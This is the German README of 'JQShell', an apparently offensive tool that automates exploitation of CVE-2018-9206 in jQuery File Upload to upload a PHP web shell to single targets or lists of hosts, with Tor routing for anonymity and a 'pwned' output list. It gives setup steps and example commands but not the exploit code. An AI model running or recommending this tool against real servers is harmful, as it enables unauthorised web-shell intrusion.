
Automatisiertes Exploit-Tool für CVE-2018-9206 (jQuery File Upload) mit Single-/Multi-Target-Scanning, Tor-Proxy-Unterstützung und Ausgabeprotokollierung für Penetrationstests und Bildungszwecke.

JQShell
Eine bewaffnete Version von CVE-2018-9206.
Haftungsausschluss
Die Verwendung dieses Tools gegen Server, die Sie nicht kontrollieren, ist in den meisten Ländern illegal. Der Autor übernimmt keine Verantwortung für die Handlungen derjenigen, die diese Software für illegale Zwecke verwenden. Diese Software ist nur für Bildungszwecke bestimmt. Bei der Erstellung dieser Software wurden keine Server illegal geknackt.
Funktionen
Einzelziel Mehrfachziel Tor
Voraussetzungen
Bitte installieren Sie diese erforderlichen Pakete.
Python3
pip3 install requests pysocks subprocess stem
Tor-Kontrollport
Um Tor in diesem Skript zu verwenden, müssen Sie Ihre torrc-Datei bearbeiten und den Tor-Kontrollport auf 9051 aktivieren.
Normalerweise befindet sich diese Datei hier: /etc/tor/torrc
Öffnen Sie diese Datei und ändern Sie diese Zeile:
#ControlPort 9051
zu
ControlPort 9051
Starten Sie den Tor-Dienst neu.
Verwendung
usage: jqshell.py [-h] [-l LIST_INIT] [-t SINGLE_TARGET] -s SHELL_LOC
[-o OUTPUTZ] [-tor]
optional arguments:
-h, --help show this help message and exit
-l LIST_INIT, --list LIST_INIT
Select for a list of assets to exploit
-t SINGLE_TARGET, --target SINGLE_TARGET
Single exploit target
-s SHELL_LOC, --shell SHELL_LOC
This is required, put the fullpath to your shell
-o OUTPUTZ, --output OUTPUTZ
This is full path to were you want to save your list
of confirmed hosts
-tor, --tor_proxy Select if you have tor installed, you will need to
enable control port
Beispiele
Ausführung gegen ein einzelnes Ziel.
python3 jqshell.py -t http://localhost/folderwerejqueryis -s /var/www/html/shell.php
Ausführung gegen ein einzelnes Ziel mit Speichern der Ausgabe.
python3 jqshell.py -t https://localhost/folderwerejqueryis -s /var/www/html/shell.php -o pwned.txt
Ausführung einer Liste mit Speichern der Ausgabe.
python3 jqshell.py -l /opt/jquery/test.txt -s /var/www/html/shell.php -o pwned.txt
Autor